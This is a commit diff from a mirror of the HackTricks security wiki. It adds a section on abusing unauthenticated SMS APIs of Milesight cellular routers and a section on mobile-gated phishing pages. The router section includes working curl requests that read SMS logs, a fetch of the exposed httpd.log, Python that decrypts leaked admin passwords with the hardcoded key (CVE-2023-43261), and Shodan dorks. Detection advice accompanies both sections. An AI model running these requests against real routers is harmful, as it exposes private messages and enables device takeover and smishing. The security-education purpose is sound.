mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Add content from: Silent Smishing: The Hidden Abuse of Cellular Router APIs
This commit is contained in:
		
							parent
							
								
									cd60902021
								
							
						
					
					
						commit
						c8a99a2b35
					
				| @ -247,6 +247,73 @@ Mitigations: | ||||
| - Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261) | ||||
| 
 | ||||
| Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS. | ||||
| 
 | ||||
| Typical unauthenticated requests (same structure for inbox/outbox): | ||||
| 
 | ||||
| ```http | ||||
| POST /cgi HTTP/1.1 | ||||
| Host: <router> | ||||
| Content-Type: application/json | ||||
| 
 | ||||
| { "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] } | ||||
| ``` | ||||
| 
 | ||||
| ```json | ||||
| { "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] } | ||||
| ``` | ||||
| 
 | ||||
| Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting. | ||||
| 
 | ||||
| Example curl to exfiltrate SMS metadata: | ||||
| 
 | ||||
| ```bash | ||||
| curl -sk -X POST http://<router>/cgi \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}' | ||||
| ``` | ||||
| 
 | ||||
| Notes on auth artifacts: | ||||
| - Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing. | ||||
| - In environments requiring auth, previously-leaked credentials (see below) restore access. | ||||
| 
 | ||||
| Credential recovery path – CVE-2023-43261: | ||||
| - Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7). | ||||
| - Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript. | ||||
| - Practical access and decrypt: | ||||
| 
 | ||||
| ```bash | ||||
| curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p' | ||||
| # Look for entries like: {"username":"admin","password":"<base64>"} | ||||
| ``` | ||||
| 
 | ||||
| Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV): | ||||
| 
 | ||||
| ```python | ||||
| import base64 | ||||
| from Crypto.Cipher import AES | ||||
| from Crypto.Util.Padding import unpad | ||||
| KEY=b'1111111111111111'; IV=b'2222222222222222' | ||||
| enc_b64='...'  # value from httpd.log | ||||
| print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode()) | ||||
| ``` | ||||
| 
 | ||||
| Hunting and detection ideas (network): | ||||
| - Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`. | ||||
| - Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing). | ||||
| - Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends. | ||||
| 
 | ||||
| Shodan/OSINT pivots (examples seen in the wild): | ||||
| - `http.html:"rt_title"` matches Milesight router panels. | ||||
| - Google dorking for exposed logs: `"/lang/log/system" ext:log`. | ||||
| 
 | ||||
| Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Detection Ideas | ||||
| 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**. | ||||
| 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs. | ||||
| @ -263,5 +330,8 @@ Mitigations: | ||||
| - [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) | ||||
| - 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS | ||||
| - 3GPP TS 33.501 – Security architecture and procedures for 5G System | ||||
| - [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) | ||||
| - [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261) | ||||
| - [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -579,6 +579,37 @@ clipboard-hijacking.md | ||||
| mobile-phishing-malicious-apps.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| ### Mobile‑gated phishing to evade crawlers/sandboxes | ||||
| Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow. | ||||
| 
 | ||||
| Minimal client snippet (typical logic): | ||||
| 
 | ||||
| ```html | ||||
| <script src="/static/detect_device.js"></script> | ||||
| ``` | ||||
| 
 | ||||
| `detect_device.js` logic (simplified): | ||||
| 
 | ||||
| ```javascript | ||||
| const isMobile = ('ontouchstart' in document.documentElement); | ||||
| fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})}) | ||||
|   .then(()=>location.reload()); | ||||
| ``` | ||||
| 
 | ||||
| Server behaviour often observed: | ||||
| - Sets a session cookie during the first load. | ||||
| - Accepts `POST /detect {"is_mobile":true|false}`. | ||||
| - Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`. | ||||
| 
 | ||||
| Hunting and detection heuristics: | ||||
| - urlscan query: `filename:"detect_device.js" AND page.status:500` | ||||
| - Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS. | ||||
| - Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks. | ||||
| 
 | ||||
| Defence tips: | ||||
| - Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content. | ||||
| - Alert on suspicious 500 responses following `POST /detect` on newly registered domains. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/) | ||||
| @ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md | ||||
| - [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/) | ||||
| - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy) | ||||
| - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/) | ||||
| - [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
|  | ||||
| @ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con | ||||
| 
 | ||||
| > [!TIP] | ||||
| > | ||||
| > - **How can I cite a page of HackTricks?** | ||||
| > - **How can I  a page of HackTricks?** | ||||
| 
 | ||||
| As long as the link **of** the page(s) where you took the information from appears it's enough.\ | ||||
| If you need a bibtex you can use something like: | ||||
| @ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user